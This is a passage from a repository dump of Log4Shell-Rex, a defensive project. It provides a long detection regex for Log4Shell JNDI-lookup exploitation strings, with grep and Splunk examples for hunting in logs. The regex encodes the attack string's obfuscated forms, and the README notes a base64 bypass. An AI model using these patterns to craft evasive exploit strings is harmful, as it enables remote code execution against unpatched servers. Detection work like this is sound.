'(?im)(?:^|[\n]).*?(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))[^\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))[^\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:2
5%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))(?:[^\n]*?(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))){2}[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?)[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))[^\n]*?(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))' 69 | ``` 70 | 71 | ### Combine it with `find` to recursively scan a (sub-)folder of log files 72 | 73 | ```bash 74 | eval "$(./RegEx_Generator.sh)" 75 | find /var/log -name "*.log" | xargs grep -P ${Log4ShellRex} 76 | ``` 77 | 78 | ```bash 79 | find /var/log -name "*.log" | xargs grep -P 
'(?im)(?:^|[\n]).*?(?:[\x24]|%(?:25%?)*24|\\u?0*(?:44|24))(?:[\x7b]|%(?:25%?)*7b|\\u?0*(?:7b|173))[^\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\u?0*(?:112|6a|4a|152))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))[^\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\u?0*(?:154|114|6c|4c))[^\n]*?(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\u?0*(?:4d|155|115|6d))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:[^\n]*?(?:[i\x{130}\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\u?0*(?:143|103|63|43))[^\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\u?0*(?:6f|4f|157|117))[^\n]*?(?:r|%(?:25%?)*(?:52|72)|\\u?0*(?:122|72|52|162))[^\n]*?(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\u?0*(?:4e|156|116|6e))[^\n]*?(?:d|%(?
:25%?)*(?:44|64)|\\u?0*(?:44|144|104|64))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\u?0*(?:110|68|48|150))(?:[^\n]*?(?:t|%(?:25%?)*(?:54|74)|\\u?0*(?:124|74|54|164))){2}[^\n]*?(?:p|%(?:25%?)*(?:50|70)|\\u?0*(?:70|50|160|120))(?:[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163)))?)[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\u?0*(?:102|62|42|142))[^\n]*?(?:a|%(?:25%?)*(?:41|61)|\\u?0*(?:101|61|41|141))[^\n]*?(?:[s\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\u?0*(?:17f|123|577|73|53|163))[^\n]*?(?:e|%(?:25%?)*(?:45|65)|\\u?0*(?:45|145|105|65))[^\n]*?(?:[\x3a]|%(?:25%?)*3a|\\u?0*(?:72|3a))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))' 80 | ``` 81 | 82 | ## Hunting in your logs using Splunk 83 | 84 | You can use this RegEx to search your indexed logs using the `| regex` 85 | [SPL](https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Regex) command 86 | 87 | ```spl 88 | index=<...> sourcetype=<...> 89 | | regex "" 90 | ``` 91 | 92 | ```spl 93 | index=<...> sourcetype=<...> 94 | | regex 
"(?im)(?:^|[\\n]).*?(?:[\\x24]|%(?:25%?)*24|\\\\u?0*(?:44|24))(?:[\\x7b]|%(?:25%?)*7b|\\\\u?0*(?:7b|173))[^\\n]*?((?:j|%(?:25%?)*(?:4a|6a)|\\\\u?0*(?:112|6a|4a|152))[^\\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))[^\\n]*?(?:[\\x3a]|%(?:25%?)*3a|\\\\u?0*(?:72|3a))[^\\n]*?((?:l|%(?:25%?)*(?:4c|6c)|\\\\u?0*(?:154|114|6c|4c))[^\\n]*?(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:a|%(?:25%?)*(?:41|61)|\\\\u?0*(?:101|61|41|141))[^\\n]*?(?:p|%(?:25%?)*(?:50|70)|\\\\u?0*(?:70|50|160|120))(?:[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163)))?|(?:r|%(?:25%?)*(?:52|72)|\\\\u?0*(?:122|72|52|162))[^\\n]*?(?:m|%(?:25%?)*(?:4d|6d)|\\\\u?0*(?:4d|155|115|6d))[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))|(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))|(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))|(?:[^\\n]*?(?:[i\\x{130}\\x{131}]|%(?:25%?)*(?:49|69|C4%(?:25%?)*B0|C4%(?:25%?)*B1)|\\\\u?0*(?:111|69|49|151|130|460|131|461))){2}[^\\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\\\u?0*(?:6f|4f|157|117))[^\\n]*?(?:p|%(?:25%?)*(?:50|70)|\\\\u?0*(?:70|50|160|120))|(?:c|%(?:25%?)*(?:43|63)|\\\\u?0*(?:143|103|63|43))[^\\n]*?(?:o|%(?:25%?)*(?:4f|6f)|\\\\u?0*(?:6f|4f|157|117))[^\\n]*?(?:r|%(?:25%?)*(?:52|72)|\\\\u?0*(?:122|72|52|162))[^\\n]*?(?:b|%(?:25%?)*(?:42|62)|\\\\u?0*(?:102|62|42|142))[^\\n]*?(?:a|%(?:25%?)*(?:41
|61)|\\\\u?0*(?:101|61|41|141))|(?:n|%(?:25%?)*(?:4e|6e)|\\\\u?0*(?:4e|156|116|6e))[^\\n]*?(?:d|%(?:25%?)*(?:44|64)|\\\\u?0*(?:44|144|104|64))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))|(?:h|%(?:25%?)*(?:48|68)|\\\\u?0*(?:110|68|48|150))(?:[^\\n]*?(?:t|%(?:25%?)*(?:54|74)|\\\\u?0*(?:124|74|54|164))){2}[^\\n]*?(?:p|%(?:25%?)*(?:50|70)|\\\\u?0*(?:70|50|160|120))(?:[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163)))?)[^\\n]*?(?:[\\x3a]|%(?:25%?)*3a|\\\\u?0*(?:72|3a))|(?:b|%(?:25%?)*(?:42|62)|\\\\u?0*(?:102|62|42|142))[^\\n]*?(?:a|%(?:25%?)*(?:41|61)|\\\\u?0*(?:101|61|41|141))[^\\n]*?(?:[s\\x{17f}]|%(?:25%?)*(?:53|73|C5%(?:25%?)*BF)|\\\\u?0*(?:17f|123|577|73|53|163))[^\\n]*?(?:e|%(?:25%?)*(?:45|65)|\\\\u?0*(?:45|145|105|65))[^\\n]*?(?:[\\x3a]|%(?:25%?)*3a|\\\\u?0*(?:72|3a))(JH[s-v]|[\\x2b\\x2f-9A-Za-z][CSiy]R7|[\\x2b\\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\\x2b\\x2f-9w-z]))" 95 | ``` 96 | 97 | ## Screenshot 98 | 99 | **regex101** 100 | ![Example Screenshot regex101](screenshots/example_4a.png) 101 | 102 | **grep -P** 103 | ![Example Screenshot Shell](screenshots/example_4b.png) 104 | 105 | **Splunk** 106 | ![Example Screenshot Splunk](screenshots/example_4c.jpeg) 107 | 108 | **Graphical representation of the RegEx** 109 | ![Example Screenshot Splunk](screenshots/viz_4.png) 110 | (Created using regexper tool from Jeff Avallone, licensed under 111 | [CC BY license](https://creativecommons.org/licenses/by/3.0/).) 
112 | 113 | ## Other 114 | 115 | **Please create a pull request / issue if you can provide syntax for more systems.** 116 | 117 | ## Credits 118 | 119 | I got help and ideas from: 120 | 121 | - [@cyberops](https://twitter.com/cyb3rops) building [log4shell-detector](https://github.com/Neo23x0/log4shell-detector/) that served as an inspiration 122 | - [@karanlyons](https://github.com/karanlyons) providing a corpus to test against 123 | -------------------------------------------------------------------------------- /README.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # _ _ _ ____ _ _ _ ____ 4 | # | | ___ __ _| || |/ ___|| |__ ___| | | | _ \ _____ __ 5 | # | | / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ / 6 | # | |__| (_) | (_| |__ _|__) | | | | __/ | |_____| _ < __/> < 7 | # |_____\___/ \__, | |_||____/|_| |_|\___|_|_| |_| \_\___/_/\_\ 8 | # |___/ 9 | # 10 | # 2021-12-13 back2root https://github.com/back2root 11 | 12 | eval "$(./RegEx_Generator.sh "${1}")" 13 | 14 | echo "Documentation printed in Markdown format to stdout" >&2 15 | echo "Use \`./README.sh > README.md\` to update README.md" >&2 16 | 17 | # shellcheck disable=SC2154 18 | cat << EOF 19 | # Log4Shell-Rex 20 | 21 | The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and 22 | CVE-2021-45046) exploitation. 23 | 24 | **If you run a version from before 2021/12/21, it's highly recommended to test and update.**\\ 25 | I've removed some quirks and enhanced performance. 26 | 27 | The RegEx aims to be PCRE compatible, but should also run on re2 and potentially more RegEx engines. 
28 | 29 | **RegEx:** 30 | \`\`\`regex 31 | ${Log4ShellRex} 32 | \`\`\` 33 | 34 | ## Capabilities 35 | 36 | By now, this regex should match the exploit regardless of how it appears: 37 | 38 | - Just logged 39 | - Case insensitive (also in all supported encodings) 40 | - URL Encoded 41 | - Recursively URL Encoded 42 | - With Unicode encoding 43 | - With Octal encoding 44 | - Base64 encoded (rudimentary) 45 | 46 | ### Background 47 | 48 | The goal is to have a RegEx that represents a reasonable tradeoff between detecting as many attack 49 | attempts as possible with an acceptable number of false positives. 50 | 51 | The APT attacker will find a way around if necessary, but less elaborate attacks will leave the 52 | warning light on. 53 | 54 | Why a (single) RegEx: Because it can be easily executed on the CLI or in a SIEM without any 55 | additional tools. If dedicated tools can be executed, use them; they exist. 56 | 57 | The length of the regex is less of a problem than its performance. Despite the length, the RegEx 58 | should be acceptably fast to execute on average log data. 59 | 60 | ### Call for action 61 | 62 | I wanna make it hard to hide an attack in real-world scenarios. 63 | 64 | If this RegEx does not match something you have seen in the wild or can show being exploitable, please 65 | create an issue. 66 | 67 | It is known that you can work around the RegEx easily by encoding different parts of the attack 68 | pattern using Base64. However, this is accepted, as \`base64\` has not made it into an 69 | official Log4j release yet. 
([LOG4J2-2446](https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-2446)) 70 | 71 | ### Tools 72 | 73 | - Test the RegEx: **[regex101](https://regex101.com/r/KqGG3W/24)** 74 | - Visualize the Regex: **[REGEXPER](https://regexper.com/#%28%3F%3A%5E%7C%5B%5Cn%5D%29.*%3F%28%3F%3A%5B%5Cx24%5D%7C%25%28%3F%3A25%25%3F%29*24%7C%5C%5Cu%3F0*%28%3F%3A44%7C24%29%29%28%3F%3A%5B%5Cx7b%5D%7C%25%28%3F%3A25%25%3F%29*7b%7C%5C%5Cu%3F0*%28%3F%3A7b%7C173%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Aj%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4a%7C6a%29%7C%5C%5Cu%3F0*%28%3F%3A112%7C6a%7C4a%7C152%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%5B%5E%5Cn%5D*%3F%28%28%3F%3Al%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4c%7C6c%29%7C%5C%5Cu%3F0*%28%3F%3A154%7C114%7C6c%7C4c%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%7C%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Am%7C%25%28%3
F%3A25%25%3F%29*%28%3F%3A4d%7C6d%29%7C%5C%5Cu%3F0*%28%3F%3A4d%7C155%7C115%7C6d%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%7C%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bi%5Cx%7B130%7D%5Cx%7B131%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A49%7C69%7CC4%25%28%3F%3A25%25%3F%29*B0%7CC4%25%28%3F%3A25%25%3F%29*B1%29%7C%5C%5Cu%3F0*%28%3F%3A111%7C69%7C49%7C151%7C130%7C460%7C131%7C461%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%7C%28%3F%3Ac%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A43%7C63%29%7C%5C%5Cu%3F0*%28%3F%3A143%7C103%7C63%7C43%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ao%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4f%7C6f%29%7C%5C%5Cu%3F0*%28%3F%3A6f%7C4f%7C157%7C117
%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ar%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A52%7C72%29%7C%5C%5Cu%3F0*%28%3F%3A122%7C72%7C52%7C162%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%7C%28%3F%3An%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A4e%7C6e%29%7C%5C%5Cu%3F0*%28%3F%3A4e%7C156%7C116%7C6e%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ad%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A44%7C64%29%7C%5C%5Cu%3F0*%28%3F%3A44%7C144%7C104%7C64%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%7C%28%3F%3Ah%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A48%7C68%29%7C%5C%5Cu%3F0*%28%3F%3A110%7C68%7C48%7C150%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3At%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A54%7C74%29%7C%5C%5Cu%3F0*%28%3F%3A124%7C74%7C54%7C164%29%29%29%7B2%7D%5B%5E%5Cn%5D*%3F%28%3F%3Ap%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A50%7C70%29%7C%5C%5Cu%3F0*%28%3F%3A70%7C50%7C160%7C120%29%29%28%3F%3A%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%29%3F%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%7C%28%3F%3Ab%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A42%7C62%29%7C%5C%5Cu%3F0*%28%3F%3A102%7C62%7C42%7C142%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Aa%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A41%7C61%29%7C%5C%5Cu%3F0*%28%3F%3A101%7C61%7C41%7C141%29%29%5B%5E%5Cn%5D*%3F%28%3F%3A%5Bs%5Cx%7B17f%7D%5D%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A53%7C73%7CC5%25%28%3F%3A25%25%3F%29*BF%29%7C%5C%5Cu%3F0*%28%3F%3A17f%7C123%7C577%7C73%7C53%7C163%29%29%5B%5E%5Cn%5D*%3F%28%3F%3Ae%7C%25%28%3F%3A25%25%3F%29*%28%3F%3A45%7C65%29%7C%5C%5Cu%3F0*%28%3F%3A45%7C145%7C105%7C65%29%29%
5B%5E%5Cn%5D*%3F%28%3F%3A%5B%5Cx3a%5D%7C%25%28%3F%3A25%25%3F%29*3a%7C%5C%5Cu%3F0*%28%3F%3A72%7C3a%29%29%28JH%5Bs-v%5D%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%5BCSiy%5DR7%7C%5B%5Cx2b%5Cx2f-9A-Za-z%5D%7B2%7D%5B048AEIMQUYcgkosw%5Dke%5B%5Cx2b%5Cx2f-9w-z%5D%29%29)** 75 | 76 | ## Hunting on your Linux machine 77 | 78 | ### On the CLI with \`grep\` 79 | Always quote the variable: the RegEx contains shell glob characters (\`*\`, \`?\`, \`[\`) and would otherwise be subject to pathname expansion. 80 | \`\`\`bash 81 | eval "\$(./RegEx_Generator.sh)" 82 | grep -P "\${Log4ShellRex}" 83 | \`\`\` 84 | 85 | \`\`\`bash 86 | grep -P '${Log4ShellRex}' 87 | \`\`\` 88 | 89 | ### Combine it with \`find\` to recursively scan a (sub-)folder of log files 90 | Use NUL-separated file names (\`-print0\` / \`xargs -0\`), otherwise paths containing whitespace break the 